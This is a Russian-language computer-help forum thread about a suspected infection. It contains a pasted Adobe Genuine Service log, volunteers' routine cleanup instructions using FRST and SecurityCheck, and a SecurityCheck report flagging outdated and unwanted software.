11/28/22 20:11:25:673 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 3548 | ProcessImageLoadPolicy set successfully
11/28/22 20:11:25:673 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 3652 | ProcessFontDisablePolicy set successfully
11/28/22 20:11:25:673 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 3652 | ProcessImageLoadPolicy set successfully
11/28/22 20:11:25:698 | [DEBUG] |  |  |  | AdobeGCClientMain |  |  | 4524 | Initializing Directory Watcher for the directory : C
11/28/22 20:11:25:726 | [ERROR] |  |  |  | AGSService |  |  | 4712 | Caller user name:�������
11/28/22 20:11:25:726 | [ERROR] |  |  |  | AGSService |  |  | 4712 | Started creating entries for uninstaller
11/28/22 20:11:25:730 | [INFO] |  |  |  | AGSService |  |  | 4712 | AdobeGCData folder already exists
11/28/22 20:11:25:730 | [INFO] |  |  |  | AGSService |  |  | 4712 | AdobeGCData folder: checking for junction/symlink
11/28/22 20:11:25:733 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4712 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData
11/28/22 20:11:25:734 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4712 | GC local storage: Valid DACL permissions found
11/28/22 20:11:25:734 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4712 | GC local storage: Valid SACL permissions found
11/28/22 20:11:25:735 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4712 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeNGLAppIDMap.db
11/28/22 20:11:25:737 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4712 | GC local storage: Valid DACL permissions found
11/28/22 20:11:25:737 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4712 | GC local storage: Valid SACL permissions found
11/28/22 20:11:25:738 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4712 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeGCLaunchEvent.db
11/28/22 20:11:25:739 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4712 | GC local storage: Valid DACL permissions found
11/28/22 20:11:25:739 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4712 | GC local storage: Valid SACL permissions found
11/28/22 20:11:25:739 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4712 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeGCData.db
11/28/22 20:11:25:739 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4712 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\adobegc.log
11/28/22 20:11:25:740 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4712 | GC local storage: Valid DACL permissions found
11/28/22 20:11:25:740 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4712 | GC local storage: Valid SACL permissions found
11/28/22 20:11:25:740 | [INFO] |  |  |  | AGSService |  |  | 4712 | Successfully created/fetched AdobeGCData Folder
11/28/22 20:11:25:740 | [INFO] |  |  |  | AGSService |  |  | 4712 | Thread...
11/28/22 20:11:25:748 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 4768 | Sandbox process request: 1 || UninstallClient * AdobeGenuineData *  |
11/28/22 20:11:25:754 | [ERROR] |  |  |  | WinSandboxingUtilities |  |  | 4768 | Failed to find explorer process id
11/28/22 20:11:25:754 | [ERROR] |  |  |  | WinSandboxingUtilities |  |  | 4768 | Failed to get explorer process token
11/28/22 20:11:25:754 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 4768 | Going to sleep for 20 mins and then will try again
11/28/22 20:11:26:478 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 4524 | Process Creation Monitoring enabled...
11/28/22 20:11:26:498 | [DEBUG] |  |  |  | AdobeGCClientMain |  |  | 4524 | Directory Watcher successfully initiated
11/28/22 20:11:26:517 | [DEBUG] |  |  |  | AGCDirectoryWatcher |  |  | 5500 | Waiting for WRITE operation Callback...
11/28/22 20:31:25:768 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 4768 | Awake from sleep and trying again to get explorer token
11/28/22 20:31:26:008 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 4768 | Sandbox process response: 3 ||  *  |
11/28/22 20:31:26:008 | [INFO] |  |  |  | AGSService |  |  | 4768 | Thread inside...
11/28/22 20:31:26:008 | [INFO] |  |  |  | AGSService |  |  | 4768 | Thread calling CFU...
11/28/22 20:31:26:027 | [INFO] |  |  |  | AdobeGCUpdater |  |  | 4768 | ***********AdobeGC Updater library invoked = 8.1.0.3 ************
11/28/22 20:31:26:027 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 4768 | Perform WF started
11/28/22 20:31:26:027 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 4768 | Perform WF completed
11/28/22 20:31:26:027 | [INFO] |  |  |  | AGSService |  |  | 4768 | Thread cfu launched...
11/28/22 20:31:26:027 | [DEBUG] |  |  |  | AdobeGCUpdaterCFU |  |  | 5212 | Trying to acquire the semaphore
11/28/22 20:31:26:027 | [DEBUG] |  |  |  | AdobeGCUpdaterCFU |  |  | 5212 | Semaphore acquired
11/28/22 20:31:26:028 | [INFO] |  |  |  | AdobeGCHostfileValidation |  |  | 5212 | Hostfile opened successfully
11/28/22 20:31:26:028 | [DEBUG] |  |  |  | AdobeGCHostfileValidation |  |  | 5212 | Checking if gocart server url is blocked in hostfile
11/28/22 20:31:26:028 | [INFO] |  |  |  | SLCoreService |  |  | 5212 | Starting up SLCore 2.0 Release (build 2.0.1.360321).
11/28/22 20:31:26:029 | [ERROR] |  |  |  | SLCoreService |  |  | 5212 | user based licensing: 0
11/28/22 20:31:26:029 | [INFO] |  |  |  | SLCoreService |  |  | 5212 | Service construction took 0.3 ms and succeed.
11/28/22 20:31:26:189 | [INFO] |  |  |  | SLCoreService |  |  | 5212 | Shutting down SLCore 2.0 Release (build 2.0.1.360321).
11/28/22 20:31:26:189 | [INFO] |  |  |  | SLCoreService |  |  | 5212 | Service destruction took 0.0 ms and succeed.
11/28/22 20:31:26:189 | [ERROR] |  |  |  | AdobeGCIALWrapper |  |  | 5212 | Fetching server URL from dispatch table
11/28/22 20:31:26:190 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | __OOBELIB_LOG_FILE__
11/28/22 20:31:26:190 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | Dispatch table loaded from path: C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\dispatchtable.xml
11/28/22 20:31:26:191 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | (re)load Local Dispatch Table status-[0].
11/28/22 20:31:26:191 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | Scope : [2]
11/28/22 20:31:26:191 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | Setting scope to GM
11/28/22 20:31:26:191 | [INFO] |  |  |  | AdobeGCIALWrapper |  |  | 5212 | AdobeIALClient 1.0 Release (build 1.0.6.3) initializing session...
11/28/22 20:31:26:191 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | EndPoint requested: [PostRulesData]
11/28/22 20:31:26:191 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | Length of the URL: [50]
11/28/22 20:31:26:191 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | Returning from getEndpointAddr: [0]
11/28/22 20:31:26:191 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | EndPoint requested: [PostRulesData]
11/28/22 20:31:26:191 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | Length of the URL: [50]
11/28/22 20:31:26:191 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | URL found [https://genuine.adobe.com/server/services/check/v1]
11/28/22 20:31:26:191 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | Returning from getEndpointAddr: [0]
11/28/22 20:31:26:191 | [ERROR] |  |  |  | AdobeGCIALWrapper |  |  | 5212 | Fetching server URL from dispatch table
11/28/22 20:31:26:192 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | Dispatch table loaded from path: C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\dispatchtable.xml
11/28/22 20:31:26:192 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | (re)load Local Dispatch Table status-[0].
11/28/22 20:31:26:192 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | Scope : [2]
11/28/22 20:31:26:192 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | Setting scope to GM
11/28/22 20:31:26:192 | [INFO] |  |  |  | AdobeGCIALWrapper |  |  | 5212 | AdobeIALClient 1.0 Release (build 1.0.6.3) initializing session...
11/28/22 20:31:26:192 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | EndPoint requested: [ETSEndPoint]
11/28/22 20:31:26:192 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | Length of the URL: [48]
11/28/22 20:31:26:192 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | Returning from getEndpointAddr: [0]
11/28/22 20:31:26:192 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | EndPoint requested: [ETSEndPoint]
11/28/22 20:31:26:192 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | Length of the URL: [48]
11/28/22 20:31:26:192 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | URL found [https://na1e.services.adobe.com/hsmessaging/rest]
11/28/22 20:31:26:192 | [INFO] |  |  |  | DispatchClientLib |  |  | 5212 | Returning from getEndpointAddr: [0]
11/28/22 20:31:26:193 | [INFO] |  |  |  | AdobeGCClientNSLookup |  |  | 5212 | Delete server domain blocked key
11/28/22 20:31:26:193 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5212 | Sandbox process request: 3 || ServerDomainBlocked * AdobeGenuineNSLookUpData *  |
11/28/22 20:31:26:430 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5212 | Sandbox process response: 1 ||
11/28/22 20:31:26:430 | [INFO] |  |  |  | AdobeGCClientNSLookup |  |  | 5212 | Delete server alias blocked key
11/28/22 20:31:26:430 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5212 | Sandbox process request: 3 || ServerAliasBlocked * AdobeGenuineNSLookUpData *  |
11/28/22 20:31:26:671 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5212 | Sandbox process response: 1 ||
11/28/22 20:31:26:671 | [INFO] |  |  |  | AdobeGCClientNSLookup |  |  | 5212 | Delete server alias value
11/28/22 20:31:26:671 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5212 | Sandbox process request: 3 || ServerAlias * AdobeGenuineNSLookUpData *  |
11/28/22 20:31:26:911 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5212 | Sandbox process response: 1 ||
11/28/22 20:31:26:911 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 5212 | Threaded CFU Started
11/28/22 20:31:26:911 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 5212 | Update call started
11/28/22 20:31:26:912 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 5212 | Suppress Update Flag = 0
11/28/22 20:31:26:912 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 5212 | GC Kill Switch = 0
11/28/22 20:31:26:912 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5212 | Sandbox process request: 1 || NextUpdateCheckDate * AdobeGenuineWaitTimestamps *  |
11/28/22 20:31:27:153 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5212 | Sandbox process response: 1 || 1669700314 *  |
11/28/22 20:31:27:153 | [ERROR] |  |  |  | AdobeGCUpdaterCFU |  |  | 5212 | Time flag read
11/28/22 20:31:27:153 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 5212 | LastUpdateCheckDurationPassed from cache 1669700314
11/28/22 20:31:27:153 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 5212 | LastUpdateCheckDurationPassed cached 1669700314 , curr 1669656687 res = 0
11/28/22 20:31:27:153 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 5212 | Suppressing update check for this launch
11/28/22 20:31:27:153 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 5212 | Update call ended
11/28/22 20:31:27:153 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 5212 | GCClient App not being downloaded
11/28/22 20:31:27:153 | [INFO] |  |  |  | AGSService |  |  | 5212 |
11/28/22 20:31:27:153 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 5212 | Threaded CFU Ended
11/28/22 20:31:27:153 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 5212 | Semaphore signalled
11/28/22 20:31:28:039 | [INFO] |  |  |  | AGSService |  |  | 4712 | Thread Finished ...
11/28/22 20:31:29:047 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 4712 | Sandbox process request: 1 || IsPatchingApplicable * AdobeGenuineData *  |
11/28/22 20:31:29:290 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 4712 | Sandbox process response: 3 ||  *  |
11/28/22 20:31:29:290 | [ERROR] |  |  |  | AdobeGCPatchingWrapper |  |  | 4712 | Failed to fetch IsPatchingApplicable. Error: 3
11/28/22 20:31:29:290 | [INFO] |  |  |  | AdobeGCPatchingWrapper |  |  | 4712 | Patching not applicable
11/28/22 20:31:29:290 | [INFO] |  |  |  | AGSService |  |  | 4712 | CreateEvent Done
11/28/22 20:31:29:290 | [INFO] |  |  |  | AGSService |  |  | 4712 | CreateTimerQueue Done
11/28/22 20:31:29:290 | [INFO] |  |  |  | AGSService |  |  | 4712 | CreateTimerQueueTimer Done
11/28/22 20:31:29:290 | [INFO] |  |  |  | AGSService |  |  | 4712 | Call timer routine in 6 hrs...
 
Последнее редактирование:
amp999 написал(а):
В папке по пути C:\Windows\Temp создаются какие-то странные логи. Файл с названием drw-18b8-8ea00f0-fshc.tmp.db и другие заархивировать не могу, т.к. он используются в данный момент
Нажмите для раскрытия...
потому что они принадлежат вашему Dr.Web Security Space который их создаёт и использует.
Проблема как понимаю решена?
 
regist написал(а):
потому что они принадлежат вашему Dr.Web Security Space который их создаёт и использует.
Проблема как понимаю решена?
Нажмите для раскрытия...
я выполнил скрип, который написал мне thyrex , отправил лог
пусть он посмотрит, и скажет...
надеюсь, что проблема решена (по крайней мере, сегодня папок больше не было и Dr.Web не ругался)
P.S. уже просто паранойю, простите, конец рабочего дня...
 
Скрипт отработал успешно. Конечно, дождитесь и ответа @thyrex
Но пока ждёте, проделайте завершающие лечение шаги:

1.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.

2.
  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.
 
Sandor написал(а):
Скрипт отработал успешно. Конечно, дождитесь и ответа @thyrex
Но пока ждёте, проделайте завершающие лечение шаги:

1.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.

2.
  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.
Нажмите для раскрытия...
 

Вложения

------------------------------- [ Windows ] -------------------------------
Контроль учётных записей пользователя включен
Запрос на повышение прав для администраторов отключен
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
--------------------------- [ OtherUtilities ] ----------------------------
Notepad++ (64-bit x64) v.8.1.9.3 Внимание! Скачать обновления
------------------------------ [ ArchAndFM ] ------------------------------
WinRAR 5.91 (64-разрядная) v.5.91.0 Внимание! Скачать обновления
------------------------------- [ Imaging ] -------------------------------
IrfanView 4.57 (64-bit) v.4.57 Внимание! Скачать обновления
FastStone Image Viewer 7.5 v.7.5 Внимание! Скачать обновления
---------------------------- [ ProxyAndVPNs ] -----------------------------
SoftEther VPN Client v.4.38.9760 Внимание! Скачать обновления
--------------------------------- [ P2P ] ---------------------------------
µTorrent v.3.5.5.45852 Внимание! Клиент сети P2P с рекламным модулем!.
-------------------------------- [ Media ] --------------------------------
iTunes v.12.12.2.2 Внимание! Скачать обновления
^Для проверки новой версии используйте приложение Apple Software Update^
AIMP v.v4.70.2239, 22.12.2020 Внимание! Скачать обновления
--------------------------- [ AdobeProduction ] ---------------------------
Adobe Flash Player 9 ActiveX v.9.0.16.0 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее.
------------------------------- [ Browser ] -------------------------------
Brave v.95.1.31.88 Внимание! Скачать обновления
---------------------------- [ UnwantedApps ] -----------------------------
CCleaner v5.66.7705 v.5.66.7705 Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.
Bonjour v.3.1.0.1 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.


По возможности исправьте перечисленное.
Читайте Рекомендации после удаления вредоносного ПО
 
Статус
В этой теме нельзя размещать новые ответы.

Похожие темы

D
Решена ПК гудит и браузер вырубается: подозрение на майнер
Ответы
13
Просмотры
576
Sandor
Sandor
K
  • Закрыта
Решена В играх резко просел фпс, подозрение на майнер
2
Ответы
25
Просмотры
608
akok
akok
Y
  • Закрыта
Решена Подозрение на вирус-майнер: скрытый пользователь John
  • miner realtek hd john
Ответы
16
Просмотры
464
YG_2024
Y
Назад
Сверху Снизу